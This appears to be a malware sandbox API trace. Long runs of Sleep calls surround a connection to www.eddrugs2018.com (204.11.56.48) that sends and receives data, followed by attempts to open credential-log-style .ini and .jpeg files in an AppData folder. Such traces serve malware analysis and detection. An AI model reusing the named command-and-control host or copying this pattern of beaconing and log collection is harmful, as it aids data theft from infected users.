Sleep (dwMilliseconds=0x7d0) [0191.376] Sleep (dwMilliseconds=0x7d0) [0191.377] Sleep (dwMilliseconds=0x7d0) [0191.379] Sleep (dwMilliseconds=0x7d0) [0191.380] Sleep (dwMilliseconds=0x7d0) [0191.382] Sleep (dwMilliseconds=0x7d0) [0191.383] Sleep (dwMilliseconds=0x7d0) [0191.385] Sleep (dwMilliseconds=0x7d0) [0191.386] Sleep (dwMilliseconds=0x7d0) [0191.388] Sleep (dwMilliseconds=0x7d0) [0191.389] Sleep (dwMilliseconds=0x7d0) [0191.391] Sleep (dwMilliseconds=0x7d0) [0191.392] Sleep (dwMilliseconds=0x7d0) [0191.394] Sleep (dwMilliseconds=0x7d0) [0191.395] Sleep (dwMilliseconds=0x7d0) [0191.397] Sleep (dwMilliseconds=0x7d0) [0191.398] Sleep (dwMilliseconds=0x7d0) [0191.400] Sleep (dwMilliseconds=0x7d0) [0191.401] Sleep (dwMilliseconds=0x7d0) [0191.403] Sleep (dwMilliseconds=0x7d0) [0191.404] Sleep (dwMilliseconds=0x7d0) [0191.406] Sleep (dwMilliseconds=0x7d0) [0191.407] Sleep (dwMilliseconds=0x7d0) [0191.409] Sleep (dwMilliseconds=0x7d0) [0191.410] Sleep (dwMilliseconds=0x7d0) [0191.427] Sleep (dwMilliseconds=0x7d0) [0191.428] Sleep (dwMilliseconds=0x7d0) [0191.430] Sleep (dwMilliseconds=0x7d0) [0191.431] Sleep (dwMilliseconds=0x7d0) [0191.433] Sleep (dwMilliseconds=0x7d0) [0191.434] Sleep (dwMilliseconds=0x7d0) [0191.436] Sleep (dwMilliseconds=0x7d0) [0191.437] Sleep (dwMilliseconds=0x7d0) [0191.439] Sleep (dwMilliseconds=0x7d0) [0191.440] Sleep (dwMilliseconds=0x7d0) [0191.442] Sleep (dwMilliseconds=0x7d0) [0191.443] Sleep (dwMilliseconds=0x7d0) [0191.445] Sleep (dwMilliseconds=0x7d0) [0191.446] Sleep (dwMilliseconds=0x7d0) [0191.448] Sleep (dwMilliseconds=0x7d0) [0191.449] Sleep (dwMilliseconds=0x7d0) [0191.451] Sleep (dwMilliseconds=0x7d0) [0191.452] Sleep (dwMilliseconds=0x7d0) [0191.454] Sleep (dwMilliseconds=0x7d0) [0191.455] Sleep (dwMilliseconds=0x7d0) [0191.457] Sleep (dwMilliseconds=0x7d0) [0191.458] Sleep (dwMilliseconds=0x7d0) [0191.460] Sleep (dwMilliseconds=0x7d0) [0191.461] Sleep (dwMilliseconds=0x7d0) [0191.463] Sleep (dwMilliseconds=0x7d0) [0191.464] Sleep (dwMilliseconds=0x7d0) [0191.466] Sleep (dwMilliseconds=0x7d0) [0191.468] Sleep (dwMilliseconds=0x7d0) [0191.469] Sleep (dwMilliseconds=0x7d0) [0191.471] Sleep (dwMilliseconds=0x7d0) [0191.472] Sleep (dwMilliseconds=0x7d0) [0191.474] Sleep (dwMilliseconds=0x7d0) [0191.475] Sleep (dwMilliseconds=0x7d0) [0191.477] Sleep (dwMilliseconds=0x7d0) [0191.478] Sleep (dwMilliseconds=0x7d0) [0191.480] Sleep (dwMilliseconds=0x7d0) [0191.481] Sleep (dwMilliseconds=0x7d0) [0191.483] Sleep (dwMilliseconds=0x7d0) [0191.484] Sleep (dwMilliseconds=0x7d0) [0191.486] Sleep (dwMilliseconds=0x7d0) [0191.487] Sleep (dwMilliseconds=0x7d0) [0191.489] Sleep (dwMilliseconds=0x7d0) [0191.490] Sleep (dwMilliseconds=0x7d0) [0191.492] Sleep (dwMilliseconds=0x7d0) [0191.493] Sleep (dwMilliseconds=0x7d0) [0191.495] Sleep (dwMilliseconds=0x7d0) [0191.496] Sleep (dwMilliseconds=0x7d0) [0191.497] Sleep (dwMilliseconds=0x7d0) [0191.499] Sleep (dwMilliseconds=0x7d0) [0191.500] Sleep (dwMilliseconds=0x7d0) [0191.502] Sleep (dwMilliseconds=0x7d0) [0191.503] Sleep (dwMilliseconds=0x7d0) [0191.505] Sleep (dwMilliseconds=0x7d0) [0191.506] Sleep (dwMilliseconds=0x7d0) [0191.508] Sleep (dwMilliseconds=0x7d0) [0191.509] Sleep (dwMilliseconds=0x7d0) [0191.511] Sleep (dwMilliseconds=0x7d0) [0191.512] Sleep (dwMilliseconds=0x7d0) [0191.514] Sleep (dwMilliseconds=0x7d0) [0191.515] Sleep (dwMilliseconds=0x7d0) [0191.517] Sleep (dwMilliseconds=0x7d0) [0191.518] Sleep (dwMilliseconds=0x7d0) [0191.520] Sleep (dwMilliseconds=0x7d0) [0191.522] Sleep (dwMilliseconds=0x7d0) [0191.523] Sleep (dwMilliseconds=0x7d0) [0191.525] Sleep (dwMilliseconds=0x7d0) [0191.527] Sleep (dwMilliseconds=0x7d0) [0191.529] Sleep (dwMilliseconds=0x7d0) [0191.530] Sleep (dwMilliseconds=0x7d0) [0191.532] Sleep (dwMilliseconds=0x7d0) [0191.534] Sleep (dwMilliseconds=0x7d0) [0191.535] Sleep (dwMilliseconds=0x7d0) [0191.537] Sleep (dwMilliseconds=0x7d0) [0191.538] Sleep (dwMilliseconds=0x7d0) [0191.540] Sleep (dwMilliseconds=0x7d0) [0191.541] Sleep (dwMilliseconds=0x7d0) [0191.543] Sleep (dwMilliseconds=0x7d0) [0191.544] Sleep (dwMilliseconds=0x7d0) [0191.546] Sleep (dwMilliseconds=0x7d0) [0191.547] Sleep (dwMilliseconds=0x7d0) [0191.549] Sleep (dwMilliseconds=0x7d0) [0191.550] Sleep (dwMilliseconds=0x7d0) [0191.552] Sleep (dwMilliseconds=0x7d0) [0191.553] Sleep (dwMilliseconds=0x7d0) [0191.555] Sleep (dwMilliseconds=0x7d0) [0191.556] Sleep (dwMilliseconds=0x7d0) [0191.558] Sleep (dwMilliseconds=0x7d0) [0191.559] Sleep (dwMilliseconds=0x7d0) [0191.561] Sleep (dwMilliseconds=0x7d0) [0191.562] Sleep (dwMilliseconds=0x7d0) [0191.564] Sleep (dwMilliseconds=0x7d0) [0191.565] Sleep (dwMilliseconds=0x7d0) [0191.567] Sleep (dwMilliseconds=0x7d0) [0191.569] Sleep (dwMilliseconds=0x7d0) [0191.570] Sleep (dwMilliseconds=0x7d0) [0191.572] Sleep (dwMilliseconds=0x7d0) [0191.573] Sleep (dwMilliseconds=0x7d0) [0191.575] Sleep (dwMilliseconds=0x7d0) [0191.576] Sleep (dwMilliseconds=0x7d0) [0191.578] Sleep (dwMilliseconds=0x7d0) [0191.579] Sleep (dwMilliseconds=0x7d0) [0191.581] Sleep (dwMilliseconds=0x7d0) [0191.584] Sleep (dwMilliseconds=0x7d0) [0191.585] Sleep (dwMilliseconds=0x7d0) [0191.587] Sleep (dwMilliseconds=0x7d0) [0191.588] Sleep (dwMilliseconds=0x7d0) [0191.590] Sleep (dwMilliseconds=0x7d0) [0191.591] Sleep (dwMilliseconds=0x7d0) [0191.593] Sleep (dwMilliseconds=0x7d0) [0191.661] Sleep (dwMilliseconds=0x7d0) [0191.663] Sleep (dwMilliseconds=0x7d0) [0191.664] Sleep (dwMilliseconds=0x7d0) [0191.666] Sleep (dwMilliseconds=0x7d0) [0191.667] Sleep (dwMilliseconds=0x7d0) [0191.669] Sleep (dwMilliseconds=0x7d0) [0191.670] Sleep (dwMilliseconds=0x7d0) [0191.672] Sleep (dwMilliseconds=0x7d0) [0191.673] Sleep (dwMilliseconds=0x7d0) [0191.675] Sleep (dwMilliseconds=0x7d0) [0191.676] Sleep (dwMilliseconds=0x7d0) [0191.678] Sleep (dwMilliseconds=0x7d0) [0191.679] Sleep (dwMilliseconds=0x7d0) [0191.681] Sleep (dwMilliseconds=0x7d0) [0191.682] Sleep (dwMilliseconds=0x7d0) [0191.684] Sleep (dwMilliseconds=0x7d0) [0191.685] Sleep (dwMilliseconds=0x7d0) [0191.687] Sleep (dwMilliseconds=0x7d0) [0191.688] Sleep (dwMilliseconds=0x7d0) [0191.690] Sleep (dwMilliseconds=0x7d0) [0191.691] Sleep (dwMilliseconds=0x7d0) [0191.693] Sleep (dwMilliseconds=0x7d0) [0191.694] Sleep (dwMilliseconds=0x7d0) [0191.696] Sleep (dwMilliseconds=0x7d0) [0191.697] Sleep (dwMilliseconds=0x7d0) [0191.699] Sleep (dwMilliseconds=0x7d0) [0191.701] Sleep (dwMilliseconds=0x7d0) [0191.702] Sleep (dwMilliseconds=0x7d0) [0191.704] Sleep (dwMilliseconds=0x7d0) [0191.705] Sleep (dwMilliseconds=0x7d0) [0191.707] Sleep (dwMilliseconds=0x7d0) [0191.708] Sleep (dwMilliseconds=0x7d0) [0191.710] Sleep (dwMilliseconds=0x7d0) [0191.711] Sleep (dwMilliseconds=0x7d0) [0191.713] Sleep (dwMilliseconds=0x7d0) [0191.714] Sleep (dwMilliseconds=0x7d0) [0191.716] Sleep (dwMilliseconds=0x7d0) [0191.717] Sleep (dwMilliseconds=0x7d0) [0191.719] Sleep (dwMilliseconds=0x7d0) [0191.720] Sleep (dwMilliseconds=0x7d0) [0191.722] Sleep (dwMilliseconds=0x7d0) [0191.723] Sleep (dwMilliseconds=0x7d0) [0191.725] Sleep (dwMilliseconds=0x7d0) [0191.726] Sleep (dwMilliseconds=0x7d0) [0191.728] Sleep (dwMilliseconds=0x7d0) [0191.729] Sleep (dwMilliseconds=0x7d0) [0191.731] Sleep (dwMilliseconds=0x7d0) [0191.733] Sleep (dwMilliseconds=0x7d0) [0191.734] Sleep (dwMilliseconds=0x7d0) [0191.736] Sleep (dwMilliseconds=0x7d0) [0191.737] Sleep (dwMilliseconds=0x7d0) [0191.739] Sleep (dwMilliseconds=0x7d0) [0191.740] Sleep (dwMilliseconds=0x7d0) [0191.742] Sleep (dwMilliseconds=0x7d0) [0191.743] Sleep (dwMilliseconds=0x7d0) [0191.745] Sleep (dwMilliseconds=0x7d0) [0191.746] Sleep (dwMilliseconds=0x7d0) [0191.748] Sleep (dwMilliseconds=0x7d0) [0191.749] Sleep (dwMilliseconds=0x7d0) [0191.751] Sleep (dwMilliseconds=0x7d0) [0191.752] Sleep (dwMilliseconds=0x7d0) [0191.754] Sleep (dwMilliseconds=0x7d0) [0191.755] Sleep (dwMilliseconds=0x7d0) [0191.757] Sleep (dwMilliseconds=0x7d0) [0191.758] Sleep (dwMilliseconds=0x7d0) [0191.760] Sleep (dwMilliseconds=0x7d0) [0191.762] Sleep (dwMilliseconds=0x7d0) [0191.764] Sleep (dwMilliseconds=0x7d0) [0191.766] socket (af=2, type=1, protocol=6) returned 0x2650 [0191.766] getaddrinfo (in: pNodeName="www.eddrugs2018.com", pServiceName="80", pHints=0x8790238*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790268 | out: ppResult=0x8790268*=0x862f440*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88842c0*(sa_family=2, sin_port=0x50, sin_addr="204.11.56.48"), ai_next=0x0)) returned 0 [0191.769] connect (s=0x2650, name=0x88842c0*(sa_family=2, sin_port=0x50, sin_addr="204.11.56.48"), namelen=16) returned 0 [0191.906] send (s=0x2650, buf=0xa10808a*, len=174, flags=0) returned 174 [0191.907] setsockopt (s=0x2650, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0191.907] recv (in: s=0x2650, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 25448 [0192.243] closesocket (s=0x2650) returned 0 [0192.243] Sleep (dwMilliseconds=0x7d0) [0192.245] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.245] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.245] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0192.245] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a140) returned 1 [0192.245] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.246] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.246] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.246] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929840) returned 1 [0192.246] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.246] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.246] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.246] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928640) returned 1 [0192.246] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.246] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.246] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.246] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928640) returned 1 [0192.246] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.246] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.246] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.246] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89292a0) returned 1 [0192.246] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.247] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.247] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.247] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0192.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.247] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.247] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.247] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a2f0) returned 1 [0192.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.247] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.247] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.247] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a2f0) returned 1 [0192.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.247] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.247] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.247] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0192.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.248] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.248] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0192.248] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929180) returned 1 [0192.248] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.248] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0192.248] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0192.248] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a380) returned 1 [0192.248] Sleep (dwMilliseconds=0x7d0) [0192.250] Sleep (dwMilliseconds=0x7d0) [0192.251] Sleep (dwMilliseconds=0x7d0) [0192.252] Sleep (dwMilliseconds=0x7d0) [0192.254] Sleep (dwMilliseconds=0x7d0) [0192.255] Sleep (dwMilliseconds=0x7d0) [0192.257] Sleep (dwMilliseconds=0x7d0) [0192.258] Sleep (dwMilliseconds=0x7d0) [0192.260] Sleep (dwMilliseconds=0x7d0) [0192.261] Sleep (dwMilliseconds=0x7d0) [0192.263] Sleep (dwMilliseconds=0x7d0) [0192.264] Sleep (dwMilliseconds=0x7d0) [0192.266] Sleep (dwMilliseconds=0x7d0) [0192.267] Sleep (dwMilliseconds=0x7d0) [0192.269] Sleep (dwMilliseconds=0x7d0) [0192.270] Sleep (dwMilliseconds=0x7d0) [0192.314] Sleep (dwMilliseconds=0x7d0) [0192.315] Sleep (dwMilliseconds=0x7d0) [0192.317] Sleep (dwMilliseconds=0x7d0) [0192.319] Sleep (dwMilliseconds=0x7d0) [0192.320] Sleep (dwMilliseconds=0x7d0) [0192.322] Sleep (dwMilliseconds=0x7d0) [0192.323] Sleep 